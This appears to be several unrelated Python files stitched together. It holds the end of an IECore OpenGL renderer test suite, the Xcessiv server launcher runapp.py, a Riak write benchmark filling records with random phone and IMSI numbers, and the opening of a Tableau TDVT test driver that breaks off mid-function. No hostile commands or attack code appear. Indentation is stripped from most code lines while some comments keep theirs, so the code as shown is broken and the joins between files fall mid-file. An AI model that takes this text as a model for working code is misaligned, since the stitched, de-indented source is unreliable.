class RecursiveProcedural( Renderer.Procedural ):
"""Creates a pyramid of spheres"""
maxLevel = 5
threadsUsed = set()
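        # class-level set shared by all instances; __testMultithreadedProcedural inspects it
        # afterwards to verify the renderer ran the procedurals on more than one thread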
def __init__( self, level = 0 ):
Renderer.Procedural.__init__( self )
self.__level = level
if level == 0 :
self.threadsUsed.clear()
def bound( self ) :
return Box3f( V3f( -1 ), V3f( 1 ) )
def render( self, renderer ):
# registers this thread id
self.threadsUsed.add( threading.currentThread().getName() )
renderer.attributeBegin()
renderer.setAttribute( "color", Color3fData( Color3f( float(self.__level)/self.maxLevel, 0, 1 - float(self.__level)/self.maxLevel ) ) )
renderer.transformBegin()
renderer.concatTransform( M44f.createTranslated(V3f( 0, 0.5, 0 )) )
renderer.concatTransform( M44f.createScaled( V3f(0.5) ) )
renderer.geometry( "sphere", {}, {} )
renderer.transformEnd()
# end of recursion
if self.__level < self.maxLevel :
renderer.transformBegin()
renderer.concatTransform( M44f.createTranslated(V3f( 0, -0.5, 0 )) )
for i in xrange( 0, 2 ) :
renderer.transformBegin()
renderer.concatTransform( M44f.createTranslated(V3f( (i - 0.5) , 0, 0)) )
renderer.concatTransform( M44f.createScaled( V3f(0.5) ) )
proc = TestRenderer.RecursiveProcedural( self.__level + 1 )
renderer.procedural( proc )
renderer.transformEnd()
renderer.transformEnd()
renderer.attributeEnd()
def hash( self ):
h = IECore.MurmurHash()
return h
class RecursiveParameterisedProcedural( ParameterisedProcedural ):
maxLevel = 5
threadsUsed = set()
def __init__( self, level = 0 ):
ParameterisedProcedural.__init__( self )
self.__level = level
if level == 0 :
self.threadsUsed.clear()
def doRenderState( self, renderer, args ):
pass
def doBound( self, args ) :
return Box3f( V3f( -1 ), V3f( 1 ) )
def doRender( self, renderer, args ):
# registers this thread id
self.threadsUsed.add( threading.currentThread().getName() )
# end of recursion
if self.__level < self.maxLevel :
for i in xrange( 0, 2 ) :
proc = TestRenderer.RecursiveParameterisedProcedural( self.__level + 1 )
proc.render( renderer )
def __testMultithreadedProcedural( self, procType ):
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.setOption( "gl:searchPath:shaderInclude", StringData( os.path.dirname( __file__ ) + "/shaders/include" ) )
r.worldBegin()
p = procType()
if isinstance( p, Renderer.Procedural ):
r.procedural( p )
else:
p.render( r )
r.worldEnd()
self.assert_( len(procType.threadsUsed) > 1 )
def __testParallelMultithreadedProcedurals( self, procType ):
renders = []
def newRender():
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.setOption( "gl:searchPath:shaderInclude", StringData( os.path.dirname( __file__ ) + "/shaders/include" ) )
r.worldBegin()
p = procType()
if isinstance( p, Renderer.Procedural ):
r.procedural( p )
else:
p.render( r )
r.worldEnd()
renders.append( 0 )
threads = []
for i in xrange( 0,10 ):
newThread = threading.Thread(target=newRender)
newThread.start()
threads.append( newThread )
for t in threads :
t.join()
def testMultithreadedProcedural( self ):
self.__testMultithreadedProcedural( self.RecursiveProcedural )
def testMultithreadedParameterisedProcedural( self ):
self.__testMultithreadedProcedural( self.RecursiveParameterisedProcedural )
def testParallelMultithreadedProcedurals( self ):
self.__testParallelMultithreadedProcedurals( self.RecursiveProcedural )
    def testParallelMultithreadedParameterisedProcedurals( self ):
self.__testParallelMultithreadedProcedurals( self.RecursiveParameterisedProcedural )
def testDisableProceduralThreading( self ):
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.setOption( "gl:searchPath:shaderInclude", StringData( os.path.dirname( __file__ ) + "/shaders/include" ) )
with WorldBlock( r ) :
r.setAttribute( "gl:procedural:reentrant", BoolData( False ) )
p = self.RecursiveParameterisedProcedural()
p.render( r )
self.assertEqual( len( self.RecursiveParameterisedProcedural.threadsUsed ), 1 )
def testObjectSpaceCulling( self ):
p = self.RecursiveProcedural()
def renderWithCulling( box ):
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.worldBegin()
r.sphere( 1.5, 0, 1, 360, {} )
r.procedural( p )
r.attributeBegin()
if True:
r.setAttribute( "gl:cullingSpace", StringData( "object" ) )
r.setAttribute( "gl:cullingBox", Box3fData( box ) )
# everything in this block is culled
r.sphere( 1.5, 0, 1, 360, {} )
r.procedural( p )
r.attributeEnd()
r.worldEnd()
return self.__countChildrenRecursive( r.scene().root() )
noCullingCounter = renderWithCulling( Box3f() )
        # verify that only half of the things are rendered when the given culling box is defined.
self.assertEqual( renderWithCulling( Box3f( V3f(2,-1,-1), V3f(3,1,1) ) ) * 2, noCullingCounter )
def testWorldSpaceCulling( self ):
p = self.RecursiveProcedural()
box = Box3f( V3f(0.001,-1,-1), V3f(1,1,1) )
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.worldBegin()
r.setAttribute( "gl:cullingSpace", StringData( "world" ) )
r.setAttribute( "gl:cullingBox", Box3fData( box ) )
r.sphere( 1, 0, 1, 360, {} ) # half-inside : 1 element
r.procedural( p ) # half-inside: 32 elements (full procedural renders 63 elements)
r.transformBegin()
if True:
r.concatTransform( M44f.createTranslated( V3f(-2, 0, 0) ) )
# everything in this block is culled
r.sphere( 1, 0, 1, 360, {} )
r.procedural( p )
r.transformEnd()
r.worldEnd()
self.assertEqual( self.__countChildrenRecursive( r.scene().root() ), 33 )
def testTransformsInImmediateRenderer( self ):
r = Renderer()
r.setOption( "gl:mode", StringData( "immediate" ) )
r.transformBegin()
r.concatTransform( M44f.createRotated( V3f( 1, 1, 1 ) ) )
r.camera( "main", { "resolution" : V2iData( V2i( 512 ) ), "projection" : StringData( "perspective" ) } )
r.transformEnd()
r.worldBegin()
# confirm that the camera transformation is not affecting the world space matrix
r.concatTransform( M44f.createTranslated( V3f( 1, 0, 0 ) ) )
self.assert_( r.getTransform().equalWithAbsError( M44f.createTranslated( V3f( 1, 0, 0 ) ), 1e-4 ) )
# confirm that setting the world space transform does not affect the camera matrix (that was already set in openGL )
r.setTransform( M44f.createTranslated( V3f( 0, 1, 0 ) ) )
self.assert_( r.getTransform().equalWithAbsError( M44f.createTranslated( V3f( 0, 1, 0 ) ), 1e-4 ) )
r.worldEnd()
def testTransformsInDeferredRenderer( self ):
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.transformBegin()
r.concatTransform( M44f.createRotated( V3f( 1, 1, 1 ) ) )
r.camera( "main", { "resolution" : V2iData( V2i( 512 ) ), "projection" : StringData( "perspective" ) } )
r.transformEnd()
r.worldBegin()
# confirm that the camera transformation is not affecting the world space matrix
self.assert_( r.getTransform().equalWithAbsError( M44f(), 1e-4 ) )
r.concatTransform( M44f.createTranslated( V3f( 1, 0, 0 ) ) )
r.concatTransform( M44f.createRotated( V3f( 1, 1, 1 ) ) )
m = r.getTransform()
r.transformBegin()
if True:
# confirm that the transformBegin did not change the current transform
self.assert_( r.getTransform().equalWithAbsError( m, 1e-4 ) )
# confirm that concatenate transform works
r.concatTransform( M44f.createTranslated( V3f( 1, 0, 0 ) ) )
self.assert_( r.getTransform().equalWithAbsError( M44f.createTranslated( V3f( 1, 0, 0 ) ) * m, 1e-4 ) )
r.concatTransform( M44f.createScaled( V3f(0.5) ) )
self.assert_( r.getTransform().equalWithAbsError( M44f.createScaled( V3f(0.5) ) * M44f.createTranslated( V3f( 1, 0, 0 ) ) * m, 1e-4 ) )
# confirm that setting the world space transform works too
m2 = M44f.createTranslated( V3f( 0, 1, 0 ) )
r.setTransform( m2 )
self.assert_( r.getTransform().equalWithAbsError( m2, 1e-4 ) )
r.attributeBegin()
if True:
# confirm that the attributeBegin did not change the current transform
self.assert_( r.getTransform().equalWithAbsError( m2, 1e-4 ) )
# confirm that setting the world space transform works too
r.setTransform( M44f.createRotated( V3f( 3, 1, 0 ) ) )
self.assert_( r.getTransform().equalWithAbsError( M44f.createRotated( V3f( 3, 1, 0 ) ), 1e-4 ) )
r.attributeEnd()
# confirms that attributeEnd recovers the matrix.
self.assert_( r.getTransform().equalWithAbsError( m2, 1e-4 ) )
r.transformEnd()
# confirms that transformEnd recovers the matrix.
self.assert_( r.getTransform().equalWithAbsError( m, 1e-4 ) )
r.worldEnd()
def testInstances(self):
r = Renderer()
r.instanceBegin( "instanceA", {} )
r.concatTransform( M44f.createTranslated( V3f( 1, 0, 0 ) ) )
r.transformBegin()
r.concatTransform( M44f.createTranslated( V3f( 1, 0, 0 ) ) )
r.geometry( "sphere", {}, {} )
r.concatTransform( M44f.createTranslated( V3f( 1, 0, 0 ) ) )
r.geometry( "sphere", {}, {} )
r.transformEnd()
r.concatTransform( M44f.createTranslated( V3f( -1, 0, 0 ) ) )
r.geometry( "sphere", {}, {} )
r.instanceEnd()
r.instanceBegin( "instanceB", {} )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, 10 ) ) )
r.instance( "instanceA" )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, 20 ) ) )
r.instance( "instanceA" )
r.instanceEnd()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.worldBegin()
r.concatTransform( M44f.createTranslated( V3f( 0, 5, 0 ) ) )
r.instance( "instanceB" )
r.setTransform( M44f.createTranslated( V3f( 0, 10, 0 ) ) )
r.instance( "instanceB" )
r.worldEnd()
g = r.scene().root()
self.assertEqual( self.__countChildrenRecursive( g ), 12 )
self.assert_( g.bound().min.equalWithAbsError( V3f( -1, 4, 9 ), 0.001 ) )
self.assert_( g.bound().max.equalWithAbsError( V3f( 4, 11, 31 ), 0.001 ) )
def testCuriousCrashOnThreadedProceduralsAndAttribute( self ):
myMesh = Reader.create( "test/IECore/data/cobFiles/pSphereShape1.cob").read()
class MyProc( Renderer.Procedural ):
def __init__( self, level = 0 ):
Renderer.Procedural.__init__( self )
self.__level = level
def bound( self ) :
return Box3f( V3f( -1 ), V3f( 1 ) )
def render( self, renderer ):
if self.__level < 2 :
for i in xrange( 0, 50 ) :
renderer.procedural( MyProc( self.__level + 1 ) )
else:
g = IECore.Group()
g.addChild( myMesh )
g.addState( IECore.AttributeState( { "name" : StringData( str(self.__level) ) } ) )
g.render( renderer )
def hash( self ):
h = IECore.MurmurHash()
return h
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.worldBegin()
p = MyProc()
r.procedural( p )
r.worldEnd()
def testDepthTest( self ) :
def doTest( depthTest, r, g, b ) :
renderer = Renderer()
renderer.setOption( "gl:mode", IECore.StringData( "immediate" ) )
renderer.setOption( "gl:searchPath:shader", IECore.StringData( os.path.dirname( __file__ ) + "/shaders" ) )
renderer.camera( "main", {
"projection" : IECore.StringData( "orthographic" ),
"resolution" : IECore.V2iData( IECore.V2i( 256 ) ),
"clippingPlanes" : IECore.V2fData( IECore.V2f( 1, 1000 ) ),
"screenWindow" : IECore.Box2fData( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) )
}
)
renderer.display( os.path.dirname( __file__ ) + "/output/depthTest.tif", "tif", "rgba", {} )
m = IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) )
with IECore.WorldBlock( renderer ) :
renderer.setAttribute( "gl:depthTest", IECore.BoolData( depthTest ) )
renderer.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0, 0, -1 ) ) )
renderer.shader( "surface", "color", { "colorValue" : IECore.Color3fData( IECore.Color3f( 1, 0, 0 ) ) } )
m.render( renderer )
renderer.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0, 0, -1 ) ) )
renderer.shader( "surface", "color", { "colorValue" : IECore.Color3fData( IECore.Color3f( 0, 1, 0 ) ) } )
m.render( renderer )
i = IECore.Reader.create( os.path.dirname( __file__ ) + "/output/depthTest.tif" ).read()
for p in i["R"].data :
self.assertEqual( p, r )
for p in i["G"].data :
self.assertEqual( p, g )
for p in i["B"].data :
self.assertEqual( p, b )
doTest( True, 1, 0, 0 )
doTest( False, 0, 1, 0 )
def testCameraVisibility( self ) :
def doRender( mode, visibility ) :
r = Renderer()
r.setOption( "gl:mode", IECore.StringData( mode ) )
r.setOption( "gl:searchPath:shaderInclude", IECore.StringData( "./glsl" ) )
r.camera( "main", {
"projection" : IECore.StringData( "perspective" ),
"projection:fov" : IECore.FloatData( 20 ),
"resolution" : IECore.V2iData( IECore.V2i( 256 ) ),
"clippingPlanes" : IECore.V2fData( IECore.V2f( 1, 1000 ) ),
"screenWindow" : IECore.Box2fData( IECore.Box2f( IECore.V2f( -3 ), IECore.V2f( 3 ) ) )
}
)
if mode=="immediate" :
r.display( os.path.dirname( __file__ ) + "/output/testCameraVisibility.tif", "tif", "rgba", {} )
with IECore.WorldBlock( r ) :
r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0, 0, -5 ) ) )
r.setAttribute( "gl:visibility:camera", IECore.BoolData( visibility ) )
r.points( 1, { "P" : IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ IECore.V3f( 0 ) ] ) ) } )
return r
# test immediate renderer by checking images
doRender( "immediate", True )
i = IECore.Reader.create( os.path.dirname( __file__ ) + "/output/testCameraVisibility.tif" ).read()
self.failUnless( i["A"].data[256 * 128 + 128] > .99 )
doRender( "immediate", False )
i = IECore.Reader.create( os.path.dirname( __file__ ) + "/output/testCameraVisibility.tif" ).read()
self.assertEqual( i["A"].data, IECore.FloatVectorData( [ 0 ] * 256 * 256 ) )
# test deferred renderer by checking scene
r = doRender( "deferred", True )
self.assertEqual( len( r.scene().root().children()[0].children() ), 1 )
r = doRender( "deferred", False )
self.assertEqual( len( r.scene().root().children() ), 0 )
def testWarningMessages( self ):
r = Renderer()
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
# gl renderer only supports "surface" shaders, so it should complain about this:
c = CapturingMessageHandler()
with c :
with IECore.WorldBlock( r ):
r.shader( "shader", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
self.assertEqual( len( c.messages ), 1 )
self.assertEqual( c.messages[0].level, Msg.Level.Warning )
# it should just ignore this, because of the "ri:" prefix:
c = CapturingMessageHandler()
with c :
with IECore.WorldBlock( r ):
r.shader( "ri:shader", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
self.assertEqual( len( c.messages ), 0 )
# this should work fine:
c = CapturingMessageHandler()
with c :
with IECore.WorldBlock( r ):
r.shader( "gl:surface", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
self.assertEqual( len( c.messages ), 0 )
# it should just ignore this, because of the "lg:" prefix:
c = CapturingMessageHandler()
with c :
with IECore.WorldBlock( r ):
r.shader( "lg:shader", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
self.assertEqual( len( c.messages ), 0 )
# this aint right!:
c = CapturingMessageHandler()
with c :
with IECore.WorldBlock( r ):
r.shader( "gl:nonsense", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
self.assertEqual( len( c.messages ), 1 )
self.assertEqual( c.messages[0].level, Msg.Level.Warning )
def tearDown( self ) :
files = [
os.path.dirname( __file__ ) + "/output/testPrimVars.tif",
os.path.dirname( __file__ ) + "/output/testImage.exr",
os.path.dirname( __file__ ) + "/output/testStackBug.tif",
os.path.dirname( __file__ ) + "/output/proceduralTest.tif",
os.path.dirname( __file__ ) + "/output/depthTest.tif",
os.path.dirname( __file__ ) + "/output/testCameraVisibility.tif",
]
for f in files :
if os.path.exists( f ) :
os.remove( f )
if __name__ == "__main__":
unittest.main()
|
runapp.py
|
from __future__ import absolute_import, print_function, division, unicode_literals
import os
import sys
import argparse
from multiprocessing import Process, Pipe
from redis import Redis
from xcessiv.server import launch
from xcessiv.scripts.runworker import runworker
from xcessiv import app
from six import iteritems
def main():
parser = argparse.ArgumentParser(description='Launch Xcessiv server and workers')
parser.add_argument('-w', '--worker', help='Define number of workers', type=int)
parser.add_argument('-p', '--port', help='Port number to be used by web server',
type=int)
parser.add_argument('-H', '--host', help='Redis host')
parser.add_argument('-P', '--redisport', help='Redis port', type=int)
parser.add_argument('-D', '--redisdb', help='Redis database number', type=int)
args = parser.parse_args()
# Check if Windows
if os.name == 'nt':
raise OSError('Xcessiv has detected that you are using Windows. '
'Unfortunately, Xcessiv does not currently support Windows. '
'The accepted workaround for this is to use Docker to run '
'Xcessiv instead. Please check the Xcessiv documentation for '
'more details.')
# Overwrite configuration from configuration file
default_config_path = os.path.join(os.path.expanduser('~'), '.xcessiv/config.py')
if os.path.exists(default_config_path):
print('Config file found at ' + default_config_path)
app.config.from_pyfile(default_config_path)
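# A minimal sketch of a ~/.xcessiv/config.py (illustrative values only; the keys mirror the
# command-line overrides applied below):
#     REDIS_HOST = 'localhost'
#     REDIS_PORT = 6379
#     REDIS_DB = 8
#     XCESSIV_PORT = 1994
#     NUM_WORKERS = 2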
# Overwrite configuration from command line arguments
cli_config = {
'REDIS_HOST': args.host,
'REDIS_PORT': args.redisport,
'REDIS_DB': args.redisdb,
'XCESSIV_PORT': args.port,
'NUM_WORKERS': args.worker
}
cli_config = dict((key, value) for key, value in iteritems(cli_config) if value is not None)
app.config.update(**cli_config)
redis_conn = (Redis(app.config['REDIS_HOST'],
app.config['REDIS_PORT'],
app.config['REDIS_DB']))
redis_conn.get(None) # will throw exception if Redis is unavailable
cwd = os.getcwd()
print(cwd)
processes = []
try:
server_proc = Process(target=launch, args=(app,))
server_proc.start()
for i in range(app.config['NUM_WORKERS']):
p = Process(target=runworker, args=(app,))
processes.append(p)
p.start()
server_proc.join()
finally:
for proc in processes:
proc.terminate()
proc.join()
server_proc.terminate()
server_proc.join()
if __name__ == '__main__':
main()
|
test_lib_index.py
|
#!/usr/bin/python
# This Python file uses the following encoding: utf-8
'''
@author: Denis Gudtsov
'''
# This is a simple benchmark test for Riak.
from lib_index import *
from riak_search import *
from multiprocessing import Process, freeze_support
import os
from timeit import default_timer as timer
import string
import random
#sys.path.append('/home/denis/soft/liclipse/pyvmmonitor/public_api')
#import pyvmmonitor
#pyvmmonitor.connect()
bucket = 'sorm3'
bucket_type = 'sorm'
value_size = 1024
kvp_pairs = 1000
#
proc_num = 10
#key_format = 'key_{pid}_{id}'
#value_format = '"value":"{}"'
def get_int(r=11):
return ''.join(random.choice(string.digits) for _ in range(r))
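# Illustrative behaviour (not part of the original script): get_int(11) returns a random
# 11-digit string such as '58204913372', used below to fake MSISDN/IMSI/IMEI values.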
def run_test (idx):
pid = os.getpid()
# print "pid: " , pid
# pids.append(pid)
# todo: optimize random
value = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(value_size))
# print json_value
for i in range(kvp_pairs):
# json_value = '{'+ value_format.format(value) +'}'
call = Call(Call_proto)
call.meta['time_start_i'] = pid+i
call.meta['A']['msisdn_s'] = get_int(11)
call.meta['A']['imsi_s'] = get_int(15)
call.meta['A']['imei_s'] = get_int(15)
call.meta['B']['msisdn_s'] = get_int(11)
call.meta['B']['imsi_s'] = get_int(15)
call.meta['B']['imei_s'] = get_int(15)
call.meta['callid_s'] = value
call.update_uniq_key()
# json_value = json.JSONEncoder().encode(call.meta)
# idx.set(key_format.format(pid=pid,id=i), call.get_json(), bucket)
idx.set(call.update_uniq_key(), call.meta, bucket)
return
if __name__ == '__main__':
freeze_support()
# print get_int(11)
nodes_remote=[{'host':'192.168.90.57','pb_port':8087},
{'host':'192.168.90.58','pb_port':8087}
]
nodes_local=[{'host':'10.10.10.101','pb_port':8087},
{'host':'10.10.10.102','pb_port':8087},
{'host':'10.10.10.103','pb_port':8087},
{'host':'10.10.10.104','pb_port':8087},
{'host':'10.10.10.105','pb_port':8087},
{'host':'10.10.10.106','pb_port':8087}
]
# idx = Index( '192.168.90.58', 8087 )
# idx = Index(nodes=nodes_local)
idx = Index(nodes=nodes_remote)
# idx.create_bucket(bucket)
# idx.create_search_index('sorm_index')
idx.create_bucket(bucket,bucket_type)
# run_test(idx)
processes = [
Process(target=run_test, args=(idx,))
for i in range(proc_num)
]
print "starting all processes, count=", len(processes)
start = timer()
map(lambda p: p.start(), processes)
print "started at ", start
print "all processes are running now, waiting..."
map(lambda p: p.join(), processes)
end = timer()
print "finished at ", end
print "total, seconds: ",(end - start)
print "total kvp wrote: ", kvp_pairs*(proc_num)
print "each kvp size: ", value_size
print "TPS: ",kvp_pairs*(proc_num)/(end - start)
idx.destroy()
exit
|
tdvt.py
|
"""
Test driver script for the Tableau Datasource Verification Tool
"""
import sys
if sys.version_info[0] < 3:
raise EnvironmentError("TDVT requires Python 3 or greater.")
import argparse
import glob
import hashlib
import json
import logging
import os
import pathlib
import queue
import shutil
import threading
import time
import zipfile
from pathlib import Path
from typing import List, Optional, Tuple, Union
from .config_gen.datasource_list import print_ds, print_configurations, print_logical_configurations
from .config_gen.tdvtconfig import TdvtInvocation
from .config_gen.test_config import TestSet, SingleLogicalTestSet, SingleExpressionTestSet, FileTestSet, TestConfig, RunTimeTestConfig
from .setup_env import create_test_environment, add_datasource
from .tabquery import *
from .tdvt_core import generate_files, run_diff, run_tests
from .version import __version__
# This contains the dictionary of configs you can run.
from .config_gen.datasource_list import WindowsRegistry, MacRegistry, LinuxRegistry
class TestOutputFiles(object):
output_actuals = 'tdvt_actuals_combined.zip'
output_tabquery_log = 'tabquery_logs.zip'
output_csv = "test_results_combined.csv"
output_json = "tdvt_output_combined.json"
all_output_files = [output_actuals, output_csv, output_json, output_tabquery_log]
@staticmethod
def copy_output_file(src_name, src_dir, dst, trim_header, append=True):
src = os.path.join(src_dir, src_name)
dst = os.path.join(os.getcwd(), dst)
logging.debug("Copying {0} to {1}".format(src, dst))
try:
dst_exists = os.path.isfile(dst)
src_file = open(src, 'r', encoding='utf8')
mode = 'w' if not dst_exists or not append else 'a'
dst_file = open(dst, mode, encoding='utf8')
line_count = 0
for line in src_file:
line_count += 1
if line_count == 1 and trim_header and dst_exists:
continue
dst_file.write(line)
src_file.close()
dst_file.close()
except IOError as e:
logging.debug("Exception while copying files: " + str(e))
return
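# Example call (this mirrors the real usage in TestRunner.copy_output_files below):
#     TestOutputFiles.copy_output_file("test_results.csv", temp_dir, TestOutputFiles.output_csv, True)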
def do_test_queue_work(i, q):
"""This will be called in a queue.join() context, so make sure to mark all work items as done and
continue through the loop. Don't try and exit or return from here if there are still work items in the queue.
See the python queue documentation."""
abort_test_run = False
while True:
# This blocks if the queue is empty.
work = q.get()
work.run()
q.task_done()
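# Wiring sketch (see test_runner() below): worker threads run this loop as daemons while the
# main thread fills the queue with TestRunner objects and blocks on queue.join() until every
# work item has been marked done.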
class TestRunner():
def __init__(self, test_set: TestSet, test_config: TdvtInvocation, lock, verbose, thread_id):
threading.Thread.__init__(self)
self.test_set = test_set
self.test_config = test_config
self.error_code = 0
self.thread_id = thread_id
self.verbose = verbose
self.thread_lock = lock
self.temp_dir = make_temp_dir([self.test_config.suite_name, str(thread_id)])
self.test_config.output_dir = self.temp_dir
def copy_files_to_zip(self, dst_file_name, src_dir, is_logs):
dst = os.path.join(os.getcwd(), dst_file_name)
mode = 'w' if not os.path.isfile(dst) else 'a'
optional_dir_name = self.test_config.config_file.replace('.', '_')
if is_logs is True:
log_dir = os.path.join(src_dir, optional_dir_name)
glob_path = glob.glob(os.path.join(log_dir, '*.txt'))
glob_path.extend(glob.glob(os.path.join(log_dir, '*.log')))
glob_path.extend(glob.glob(os.path.join(log_dir, 'crashdumps/*')))
else:
glob_path = glob.glob(os.path.join(src_dir, 'actual.*'))
with zipfile.ZipFile(dst, mode, zipfile.ZIP_DEFLATED) as myzip:
for actual in glob_path:
path = pathlib.PurePath(actual)
file_to_be_zipped = path.name
inner_output = os.path.join(optional_dir_name, file_to_be_zipped)
myzip.write(actual, inner_output)
def copy_output_files(self):
TestOutputFiles.copy_output_file("test_results.csv", self.temp_dir, TestOutputFiles.output_csv, True)
def copy_test_result_file(self):
src = os.path.join(self.temp_dir, "tdvt_output.json")
dst = os.path.join(os.getcwd(), TestOutputFiles.output_json)
try:
if not os.path.isfile(dst):
shutil.copyfile(src, dst)
else:
src_file = open(src, 'r', encoding='utf8')
results = json.load(src_file)
src_file.close()
dst_file = open(dst, 'r', encoding='utf8')
existing_results = json.load(dst_file)
dst_file.close()
existing_results['failed_tests'].extend(results['failed_tests'])
existing_results['successful_tests'].extend(results['successful_tests'])
existing_results['skipped_tests'].extend(results['skipped_tests'])
existing_results['disabled_tests'].extend(results['disabled_tests'])
# Check the newly succeeding tests, and if they are in the existing failed
# test list, remove them from the failed test list since they now succeed
for element in results['successful_tests']:
for failed in existing_results['failed_tests']:
if element['test_name'] == failed['test_name']:
existing_results['failed_tests'].remove(failed)
dst_file = open(dst, 'w', encoding='utf8')
json.dump(existing_results, dst_file)
dst_file.close()
except IOError:
return
def copy_files_and_cleanup(self):
left_temp_dir = False
try:
self.copy_files_to_zip(TestOutputFiles.output_actuals, self.temp_dir, is_logs=False)
self.copy_files_to_zip(TestOutputFiles.output_tabquery_log, self.temp_dir, is_logs=True)
self.copy_output_files()
self.copy_test_result_file()
except Exception as e:
print(e)
pass
try:
if not self.test_config.leave_temp_dir:
shutil.rmtree(self.temp_dir)
else:
left_temp_dir = True
except:
pass
return left_temp_dir
def run(self):
# Send output to null.
DEVNULL = open(os.devnull, 'wb')
output = DEVNULL if not self.verbose else None
logging.debug("\nRunning tdvt " + str(self.test_config) + " tdvt thread id: " + str(self.thread_id) + "\n")
print("Running {0} {1} {2}\n".format(self.test_config.suite_name, self.test_config.config_file,
str(self.thread_id)))
start_time = time.time()
self.test_config.thread_id = self.thread_id
failed_tests, skipped_tests, disabled_tests, total_tests = run_tests(self.test_config, self.test_set)
logging.debug("\nFinished tdvt " + str(self.test_config) + "\n")
print("\nFinished {0} {1} {2}\n".format(self.test_config.suite_name, self.test_config.config_file,
str(self.thread_id)))
self.failed_tests = failed_tests
self.skipped_tests = skipped_tests
self.disabled_tests = disabled_tests
self.total_tests = total_tests
def delete_output_files(root_dir):
for f in TestOutputFiles.all_output_files:
out_file = os.path.join(root_dir, f)
for matched_file in glob.glob(out_file):
if os.path.exists(matched_file):
try:
os.unlink(matched_file)
except Exception as e:
print(e)
continue
def get_datasource_registry(platform):
"""Get the datasources to run based on the suite parameter."""
if sys.platform.startswith("darwin"):
reg = MacRegistry()
elif sys.platform.startswith("linux"):
reg = LinuxRegistry()
else:
reg = WindowsRegistry()
return reg
def enqueue_single_test(args, ds_info: TestConfig, suite) -> Union[Tuple[None, None], Tuple[Union[SingleLogicalTestSet, SingleExpressionTestSet], TdvtInvocation]]: # noqa: E501
if not args.command == 'run-pattern' or not args.tds_pattern or (args.logical_pattern and args.expression_pattern):
return None, None
test_set = None
if args.logical_pattern:
test_set = SingleLogicalTestSet(suite, get_root_dir(), args.logical_pattern, args.tds_pattern,
args.test_pattern_exclude, ds_info)
else:
test_set = SingleExpressionTestSet(suite, get_root_dir(), args.expression_pattern, args.tds_pattern,
args.test_pattern_exclude, ds_info)
#Only try to run tests if there are some.
if not test_set.generate_test_file_list():
return None, None
tdvt_invocation = TdvtInvocation(from_args=args, test_config=ds_info)
tdvt_invocation.tds = test_set.tds_name
tdvt_invocation.logical = test_set.is_logical
tdvt_invocation.config_file = test_set.config_name
return test_set, tdvt_invocation
def enqueue_failed_tests(run_file: Path, root_directory, args, rt: RunTimeTestConfig = None):
try:
with run_file.open('r', encoding='utf8') as file:
tests = json.load(file)
except IOError as e:
logging.error("Error opening " + str(run_file) + " error: " + str(e))
return
delete_output_files(os.getcwd())
all_test_configs = {}
all_tdvt_test_configs = {}
all_test_pairs = []
failed_tests = tests['failed_tests']
# Go through the failed tests and group the ones that can be run together in a FileTestSet.
for f in failed_tests:
test_file_path = f['test_file']
expected_message = f['expected_message'] if 'expected_message' in f else ''
test_root_dir = root_directory
tds_base = os.path.split(f['tds'])[1]
tds = get_tds_full_path(root_directory, tds_base)
logging.debug("Found failed test: " + test_file_path + " and tds " + tds)
tdvt_invocation = TdvtInvocation(from_json=f['test_config'])
if rt:
tdvt_invocation.set_run_time_test_config(rt)
tdvt_invocation.tds = tds
tdvt_invocation.leave_temp_dir = is_test(args) and args.noclean if args else False
suite_name = f['test_config']['suite_name']
password_file = f['password_file'] if 'password_file' in f else ''
# Use a hash of the test file path to distinguish unique test runs (since the config only supports one test path).
# Otherwise two tests with the same name could show up and the first result file would overwrite the second.
tt = "L" if tdvt_invocation.logical else "E"
test_set_unique_id = hashlib.sha224(
(os.path.split(test_file_path)[0] + "_" + tds_base + "_" + tt).replace("-", "_").encode())
test_set_unique_id = test_set_unique_id.hexdigest()
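# Illustrative example (assumed values): for a failed expression test file
# 'exprtests/standard/setup.agg.avg.txt' with tds 'cast_calcs.postgres_odbc.tds', the hashed
# string is 'exprtests/standard_cast_calcs.postgres_odbc.tds_E' (any '-' replaced by '_'),
# and test_set_unique_id is its sha224 hex digest.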
test_set_config = None
if not suite_name in all_test_configs:
all_test_configs[suite_name] = {}
if not test_set_unique_id in all_test_configs[suite_name]:
tdvt_invocation.output_dir = make_temp_dir([test_set_unique_id])
all_tdvt_test_configs[test_set_unique_id] = tdvt_invocation
run_time_config = RunTimeTestConfig(60*60, 1)
test_set_config = TestConfig(suite_name, '', run_time_config)
all_test_configs[suite_name][test_set_unique_id] = test_set_config
else:
test_set_config = all_test_configs[suite_name][test_set_unique_id]
current_test_set = None
if tdvt_invocation.logical:
current_test_set = test_set_config.get_logical_tests(test_set_unique_id)
else:
current_test_set = test_set_config.get_expression_tests(test_set_unique_id)
if current_test_set and len(current_test_set) == 1:
